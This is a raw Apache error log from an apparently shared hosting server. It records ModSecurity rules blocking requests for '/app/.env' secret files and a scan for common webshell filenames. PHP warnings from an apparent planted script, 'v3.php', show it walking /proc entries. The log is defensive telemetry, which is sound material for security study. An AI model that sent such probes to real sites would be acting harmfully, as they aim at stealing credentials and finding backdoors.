[Tue May 12 01:53:21.748937 2026] [security2:error] [pid 1709071:tid 1709106] [client 176.65.139.232:54114] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "dev3.rentparadise.fr"] [uri "/app/.env"] [unique_id "agJr8bvMumyrWMfSu7qdVAAAANM"]
[Tue May 12 01:53:21.749202 2026] [security2:error] [pid 1709071:tid 1709106] [client 176.65.139.232:54114] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "dev3.rentparadise.fr"] [uri "/app/.env"] [unique_id "agJr8bvMumyrWMfSu7qdVAAAANM"]
[Tue May 12 01:53:21.993737 2026] [security2:error] [pid 1709071:tid 1709106] [client 176.65.139.232:54114] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "dev3.rentparadise.fr"] [uri "/index.php"] [unique_id "agJr8bvMumyrWMfSu7qdVAAAANM"]
PHP Warning:  filesize(): stat failed for /proc/1704659/task/1704671/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704659/task/1704671/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1704659/task/1704671/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704659/task/1704671/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1704659/task/1704671/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704659/task/1704671/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Tue May 12 01:54:13.546641 2026] [security2:error] [pid 1730207:tid 1730228] [client 43.157.149.188:35898] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.rixonephotography.com"] [uri "/"] [unique_id "agJsJTue9Sp-pIv_Bb6DewAAAVM"]
[Tue May 12 01:54:18.997029 2026] [security2:error] [pid 1707624:tid 1707690] [client 43.157.149.188:52916] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "rixonephotography.com"] [uri "/"] [unique_id "agJsKrOxS7i6i_mT2NK8MQAAAEg"], referer: http://www.rixonephotography.com
[Tue May 12 01:54:53.237989 2026] [:error] [pid 1707624:tid 1707703] [client 144.76.19.157:31084] File does not exist: /home/totalcloud/public_html/index.php
PHP Warning:  filesize(): stat failed for /proc/1704253/task/1704262/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704253/task/1704262/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1704253/task/1704262/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704253/task/1704262/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1704253/task/1704262/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704253/task/1704262/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Tue May 12 01:55:41.850282 2026] [security2:error] [pid 1691274:tid 1691289] [client 43.157.175.122:41032] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.labaujue.com"] [uri "/category/reseaux-sociaux/facebook/"] [unique_id "agJsfVfdQaraX_prmqcTCwAAAAw"]
[Tue May 12 01:55:47.677261 2026] [security2:error] [pid 1695975:tid 1695984] [client 150.109.119.38:59830] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "castiglionecf.com"] [uri "/"] [unique_id "agJsg9VI9ymHBxup74-BLwAAAIY"]
[Tue May 12 01:55:52.456888 2026] [security2:error] [pid 1691274:tid 1691293] [client 150.109.119.38:44444] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "castiglionecf.com"] [uri "/"] [unique_id "agJsiFfdQaraX_prmqcTGgAAABE"], referer: http://castiglionecf.com
[Tue May 12 01:55:55.647536 2026] [security2:error] [pid 1695975:tid 1695999] [client 150.109.119.38:47932] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.castiglionecorporatefinance.fr"] [uri "/"] [unique_id "agJsi9VI9ymHBxup74-BPAAAAJU"], referer: https://castiglionecf.com/
[Tue May 12 01:56:14.628246 2026] [authz_core:error] [pid 1730175:tid 1730178] [client 47.128.58.46:30770] AH01630: client denied by server configuration: /home/krakouka/public_html/wp-includes/customize/error_log
[Tue May 12 01:56:22.611571 2026] [security2:error] [pid 1707624:tid 1707704] [client 1.15.52.154:49354] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "k06.fr"] [uri "/"] [unique_id "agJsprOxS7i6i_mT2NK8uwAAAFY"]
PHP Warning:  filesize(): stat failed for /proc/4/task/4/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/4/task/4/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/4/task/4/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/4/task/4/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/4/task/4/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/4/task/4/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Tue May 12 01:56:31.939082 2026] [security2:error] [pid 1707624:tid 1707690] [client 43.156.34.42:37554] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "krakoukas.com"] [uri "/category/personnes/stephane-pecaut/"] [unique_id "agJsr7OxS7i6i_mT2NK8wwAAAEg"]
[Tue May 12 01:56:40.998010 2026] [autoindex:error] [pid 1691274:tid 1691298] [client 20.151.0.198:35806] AH01276: Cannot serve directory /home/letamsga/public_html/wp-admin/css/colors/blue/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Tue May 12 01:57:14.840164 2026] [security2:error] [pid 1695975:tid 1695989] [client 43.165.7.132:60334] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "castiglionecorporatefinance.fr"] [uri "/"] [unique_id "agJs2tVI9ymHBxup74-BugAAAIs"]
[Tue May 12 01:57:18.272702 2026] [security2:error] [pid 1730207:tid 1730227] [client 43.165.7.132:38836] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "castiglionecorporatefinance.fr"] [uri "/"] [unique_id "agJs3jue9Sp-pIv_Bb6EYAAAAVI"], referer: http://castiglionecorporatefinance.fr
[Tue May 12 01:57:20.122079 2026] [security2:error] [pid 1709071:tid 1709110] [client 43.165.7.132:42264] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.castiglionecorporatefinance.fr"] [uri "/"] [unique_id "agJs4LvMumyrWMfSu7qeSAAAANc"], referer: https://castiglionecorporatefinance.fr/
PHP Warning:  filesize(): stat failed for /proc/204/task/204/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/204/task/204/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/204/task/204/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/204/task/204/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/204/task/204/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/204/task/204/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Tue May 12 01:57:36.100198 2026] [security2:error] [pid 1691274:tid 1691278] [client 43.165.7.132:60182] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "culturesvoile.com"] [uri "/"] [unique_id "agJs8FfdQaraX_prmqcTeQAAAAE"], referer: http://culturesvoile.com
[Tue May 12 01:57:51.908580 2026] [security2:error] [pid 1707624:tid 1707700] [client 43.156.66.8:34116] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "rentparadise.fr"] [uri "/"] [unique_id "agJs_7OxS7i6i_mT2NK8_AAAAFI"]
[Tue May 12 01:57:57.158062 2026] [security2:error] [pid 1730207:tid 1730218] [client 43.156.66.8:38616] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "rentparadise.fr"] [uri "/camping-port-grimaud/la-restauration/"] [unique_id "agJtBTue9Sp-pIv_Bb6EdgAAAUk"], referer: https://rentparadise.fr/?p=557
[Tue May 12 01:58:14.254749 2026] [ssl:error] [pid 1709071:tid 1709111] (EAI 2)Name or service not known: [client 34.245.53.45:35812] AH01972: could not resolve address of OCSP responder r10.o.lencr.org
[Tue May 12 01:58:14.255276 2026] [ssl:error] [pid 1709071:tid 1709111] AH01941: stapling_renew_response: responder error
[Tue May 12 01:58:19.467293 2026] [authz_core:error] [pid 1709071:tid 1709097] [client 47.128.23.42:11092] AH01630: client denied by server configuration: /home/castigli/public_html/wp-includes/theme-compat/error_log
[Tue May 12 01:59:11.520928 2026] [security2:error] [pid 1730207:tid 1730209] [client 43.132.214.228:38662] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.maelbailly.fr"] [uri "/wp-content/uploads/2019/12/introduction-et-diapo-extrait-3.mp3"] [unique_id "agJtTzue9Sp-pIv_Bb6EnAAAAUA"]
[Tue May 12 01:59:21.658986 2026] [:error] [pid 1707624:tid 1707694] [client 20.220.233.65:56598] File does not exist: /home/domaine1/public_html/erreur.php
[Tue May 12 01:59:21.753003 2026] [:error] [pid 1707624:tid 1707694] [client 20.220.233.65:56598] File does not exist: /home/domaine1/public_html/moon.php
[Tue May 12 01:59:21.753085 2026] [:error] [pid 1707624:tid 1707694] [client 20.220.233.65:56598] File does not exist: /home/domaine1/public_html/erreur.php
[Tue May 12 01:59:21.848621 2026] [:error] [pid 1707624:tid 1707694] [client 20.220.233.65:56598] File does not exist: /home/domaine1/public_html/a1.php
[Tue May 12 01:59:21.848757 2026] [:error] [pid 1707624:tid 1707694] [client 20.220.233.65:56598] File does not exist: /home/domaine1/public_html/erreur.php
[Tue May 12 01:59:21.941566 2026] [:error] [pid 1707624:tid 1707694] [client 20.220.233.65:56598] File does not exist: /home/domaine1/public_html/ahax.php
[Tue May 12 01:59:21.941690 2026] [:error] [pid 1707624:tid 1707694] [client 20.220.233.65:56598] File does not exist: /home/domaine1/public_html/erreur.php
[Tue May 12 01:59:22.069713 2026] [:error] [pid 1707624:tid 1707694] [client 20.220.233.65:56598] File does not exist: /home/domaine1/public_html/lite.php
[Tue May 12 01:59:22.069800 2026] [:error] [pid 1707624:tid 1707694] [client 20.220.233.65:56598] File does not exist: /home/domaine1/public_html/erreur.php
[Tue May 12 01:59:22.161025 2026] [:error] [pid 1707624:tid 1707694] [client 20.220.233.65:56598] File does not exist: /home/domaine1/public_html/k.php
[Tue May 12 01:59:22.161108 2026] [:error] [pid 1707624:tid 1707694] [client 20.220.233.65:56598] File does not exist: /home/domaine1/public_html/erreur.php
[Tue May 12 01:59:22.291662 2026] [:error] [pid 1707624:tid 1707694] [client 20.220.233.65:56598] File does not exist: /home/domaine1/public_html/leaf.php
[Tue May 12 01:59:22.291766 2026] [:error] [pid 1707624:tid 1707694] [client 20.220.233.65:56598] File does not exist: /home/domaine1/public_html/erreur.php
[Tue May 12 01:59:24.459850 2026] [security2:error] [pid 1730175:tid 1730189] [client 176.65.139.231:50762] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/app/.env"] [unique_id "agJtXHo6NvB9WXx5V-5wgwAAAQw"]
[Tue May 12 01:59:24.460081 2026] [security2:error] [pid 1730175:tid 1730189] [client 176.65.139.231:50762] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/app/.env"] [unique_id "agJtXHo6NvB9WXx5V-5wgwAAAQw"]
[Tue May 12 01:59:24.460614 2026] [core:error] [pid 1730175:tid 1730189] [client 176.65.139.231:50762] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 01:59:24.460770 2026] [security2:error] [pid 1730175:tid 1730189] [client 176.65.139.231:50762] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.castiglionecorporatefinance.fr"] [uri "/app/.env"] [unique_id "agJtXHo6NvB9WXx5V-5wgwAAAQw"]
[Tue May 12 01:59:24.654350 2026] [security2:error] [pid 1691274:tid 1691281] [client 176.65.139.236:36482] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "castiglionecf.fr"] [uri "/app/.env"] [unique_id "agJtXFfdQaraX_prmqcTygAAAAQ"]
[Tue May 12 01:59:24.654575 2026] [security2:error] [pid 1691274:tid 1691281] [client 176.65.139.236:36482] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "castiglionecf.fr"] [uri "/app/.env"] [unique_id "agJtXFfdQaraX_prmqcTygAAAAQ"]
[Tue May 12 01:59:24.655094 2026] [core:error] [pid 1691274:tid 1691281] [client 176.65.139.236:36482] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 01:59:24.655599 2026] [security2:error] [pid 1691274:tid 1691281] [client 176.65.139.236:36482] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "castiglionecf.fr"] [uri "/app/.env"] [unique_id "agJtXFfdQaraX_prmqcTygAAAAQ"]
[Tue May 12 01:59:25.415067 2026] [:error] [pid 1707624:tid 1707694] [client 20.220.233.65:56598] File does not exist: /home/domaine1/public_html/wp-conflg.php
[Tue May 12 01:59:25.415153 2026] [:error] [pid 1707624:tid 1707694] [client 20.220.233.65:56598] File does not exist: /home/domaine1/public_html/erreur.php
[Tue May 12 01:59:25.510908 2026] [:error] [pid 1707624:tid 1707694] [client 20.220.233.65:56598] File does not exist: /home/domaine1/public_html/wp_filemanager.php
[Tue May 12 01:59:25.510991 2026] [:error] [pid 1707624:tid 1707694] [client 20.220.233.65:56598] File does not exist: /home/domaine1/public_html/erreur.php
[Tue May 12 01:59:25.547731 2026] [security2:error] [pid 1709071:tid 1709089] [client 43.134.51.171:60030] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJtXbvMumyrWMfSu7qeqwAAAMI"]
[Tue May 12 01:59:25.629576 2026] [:error] [pid 1707624:tid 1707694] [client 20.220.233.65:56598] File does not exist: /home/domaine1/public_html/pp.php
[Tue May 12 01:59:25.629657 2026] [:error] [pid 1707624:tid 1707694] [client 20.220.233.65:56598] File does not exist: /home/domaine1/public_html/erreur.php
[Tue May 12 01:59:25.721901 2026] [:error] [pid 1707624:tid 1707694] [client 20.220.233.65:56598] File does not exist: /home/domaine1/public_html/index26.php
[Tue May 12 01:59:25.721972 2026] [:error] [pid 1707624:tid 1707694] [client 20.220.233.65:56598] File does not exist: /home/domaine1/public_html/erreur.php
[Tue May 12 01:59:25.827571 2026] [:error] [pid 1707624:tid 1707694] [client 20.220.233.65:56598] File does not exist: /home/domaine1/public_html/12.php
[Tue May 12 01:59:25.827639 2026] [:error] [pid 1707624:tid 1707694] [client 20.220.233.65:56598] File does not exist: /home/domaine1/public_html/erreur.php
[Tue May 12 01:59:25.939350 2026] [:error] [pid 1707624:tid 1707694] [client 20.220.233.65:56598] File does not exist: /home/domaine1/public_html/Marvins.php
[Tue May 12 01:59:25.939419 2026] [:error] [pid 1707624:tid 1707694] [client 20.220.233.65:56598] File does not exist: /home/domaine1/public_html/erreur.php
